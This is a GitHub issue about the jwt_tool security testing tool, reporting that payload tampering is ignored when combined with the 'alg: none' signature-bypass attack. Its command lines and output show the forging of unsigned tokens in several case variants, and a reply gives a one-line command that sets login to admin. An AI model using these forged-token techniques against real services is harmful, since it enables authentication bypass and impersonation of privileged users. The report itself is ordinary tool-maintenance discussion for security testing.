Skip to content
New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

#

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

Jump to bottom

tempering is ignored when combined with an attack #84

Open
noraj opened this issue Oct 8, 2022 · 1 comment
Open

tempering is ignored when combined with an attack #84

noraj opened this issue Oct 8, 2022 · 1 comment

Comments

@noraj
Copy link

noraj commented Oct 8, 2022

When combining temper + an attack, the output token is the original token + the attack, the tempering is ignored.

For example:

$ jwt-tool eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXUyJ9.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.OTgxOGE0YWE5Y2UyYTQ5N2FlMzZlZmMwZTIxOGIwOTFhZDdjOTRlYWE4MDFkMWJlOTgwN2E1NTkxMzAzMGMwYw -T -X a

...

Token payload values:
[1] login = "noraj"
[2] iat = 1665254583    ==> TIMESTAMP = 2022-10-08 20:43:03 (UTC)
[3] *ADD A VALUE*
[4] *DELETE A VALUE*
[5] *UPDATE TIMESTAMPS*
[0] Continue to next step

Please select a field number:
(or 0 to Continue)
> 1

Current value of login is: noraj
Please enter new value and hit ENTER
> admin 
[1] login = "admin"
[2] iat = 1665254583    ==> TIMESTAMP = 2022-10-08 20:43:03 (UTC)
[3] *ADD A VALUE*
[4] *DELETE A VALUE*
[5] *UPDATE TIMESTAMPS*
[0] Continue to next step

Please select a field number:
(or 0 to Continue)
> 0
jwttool_5f095c12269a0436e321cc1cff90399b - EXPLOIT: "alg":"none" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJub25lIiwidHlwIjoiSldTIn0.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.
jwttool_e67565a408b902fbaee7f0551345ceec - EXPLOIT: "alg":"None" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJOb25lIiwidHlwIjoiSldTIn0.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.
jwttool_09935cb7b6cadff540561326dd3688d1 - EXPLOIT: "alg":"NONE" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJOT05FIiwidHlwIjoiSldTIn0.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.
jwttool_e8a178e70ccfaab8ad7ff0ae90add944 - EXPLOIT: "alg":"nOnE" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJuT25FIiwidHlwIjoiSldTIn0.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.

The outputed token contains user noraj and not admin.
@noraj
Copy link
Author

noraj commented Oct 8, 2022

I know I can use this:

$ jwt-tool eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXUyJ9.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.OTgxOGE0YWE5Y2UyYTQ5N2FlMzZlZmMwZTIxOGIwOTFhZDdjOTRlYWE4MDFkMWJlOTgwN2E1NTkxMzAzMGMwYw -X a -pc login -pv admin -I

# for free to join this conversation on GitHub. Already have an account? # to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@noraj